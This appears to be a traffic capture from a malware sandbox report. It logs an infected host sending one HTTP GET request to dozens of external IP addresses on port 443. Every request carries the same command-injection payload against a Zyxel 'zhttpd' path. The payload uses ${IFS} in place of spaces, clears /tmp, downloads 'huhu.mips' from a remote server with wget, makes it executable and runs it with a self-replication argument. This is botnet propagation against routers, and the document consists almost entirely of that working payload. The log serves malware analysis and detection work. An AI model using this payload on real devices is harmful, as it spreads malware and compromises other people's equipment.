                                                Jan 29, 2024 07:07:49.370822906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4742192.168.2.234489883.20.38.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370826006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4743192.168.2.2349098220.114.114.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370858908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4744192.168.2.2334850171.234.131.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370915890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4745192.168.2.2338518119.198.79.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370942116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4746192.168.2.235714664.65.11.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370984077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4747192.168.2.2335918119.162.135.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371042967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4748192.168.2.2356354162.162.86.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371084929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4749192.168.2.234635884.228.98.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371104956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4750192.168.2.2346806195.176.246.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371134996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4751192.168.2.2337064155.212.20.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371175051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4752192.168.2.2348662155.67.213.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371232986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4753192.168.2.235640051.230.211.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371252060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4754192.168.2.233544477.243.138.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371321917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4755192.168.2.235897040.32.202.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.371350050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4756192.168.2.2356672210.62.144.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381726980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4757192.168.2.23389509.185.103.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381758928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4758192.168.2.2342718156.188.112.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381781101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4759192.168.2.2350328197.157.16.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381814003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4760192.168.2.2349000132.42.94.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381880045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4761192.168.2.233309696.117.182.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381911993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4762192.168.2.235561041.131.25.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381966114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4763192.168.2.2352958168.185.99.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.381995916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4764192.168.2.2336396174.225.73.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382035971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4765192.168.2.233609054.59.88.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382076979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4766192.168.2.2341786176.30.194.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382107973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4767192.168.2.234801632.81.25.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382165909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4768192.168.2.234315671.116.187.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382214069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4769192.168.2.2353834194.212.86.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382242918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4770192.168.2.234903627.97.83.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382291079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4771192.168.2.233696662.232.234.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382294893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4772192.168.2.234000075.223.128.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382313967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4773192.168.2.2344706166.138.63.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382345915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4774192.168.2.233966087.137.26.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382406950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4775192.168.2.2338268111.124.3.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382446051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4776192.168.2.2346110190.222.249.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382496119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4777192.168.2.234769085.115.143.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382514000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4778192.168.2.235078264.238.146.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382576942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4779192.168.2.235137450.56.27.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382611990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4780192.168.2.2335448123.132.86.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382656097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4781192.168.2.2342702129.201.146.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382704020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4782192.168.2.2340066189.214.30.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382724047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4783192.168.2.2344470193.24.43.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382780075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4784192.168.2.234819869.15.87.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382813931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4785192.168.2.2354410161.39.87.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382868052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4786192.168.2.235377871.224.227.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382905006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4787192.168.2.2349894206.252.142.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.382947922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4788192.168.2.2349722188.182.47.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383003950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4789192.168.2.2336382126.248.46.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383049011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4790192.168.2.235841088.193.167.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383096933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4791192.168.2.2360798151.165.241.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383124113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4792192.168.2.2334424150.124.246.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383153915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4793192.168.2.233855073.192.201.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383207083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4794192.168.2.2336790103.137.84.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383240938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4795192.168.2.23396269.238.150.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383269072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4796192.168.2.234437853.125.146.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383313894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4797192.168.2.2347716131.219.13.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383354902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4798192.168.2.234476665.53.35.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383409977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4799192.168.2.2348038196.151.143.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383429050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4800192.168.2.235368862.174.143.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383486032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4801192.168.2.234222440.249.166.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383543968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4802192.168.2.234817452.226.18.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383604050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4803192.168.2.235832434.201.179.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383636951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4804192.168.2.2358656146.53.106.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383678913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4805192.168.2.2335936153.226.122.101443
                                                TimestampBytes transferredDirectionData
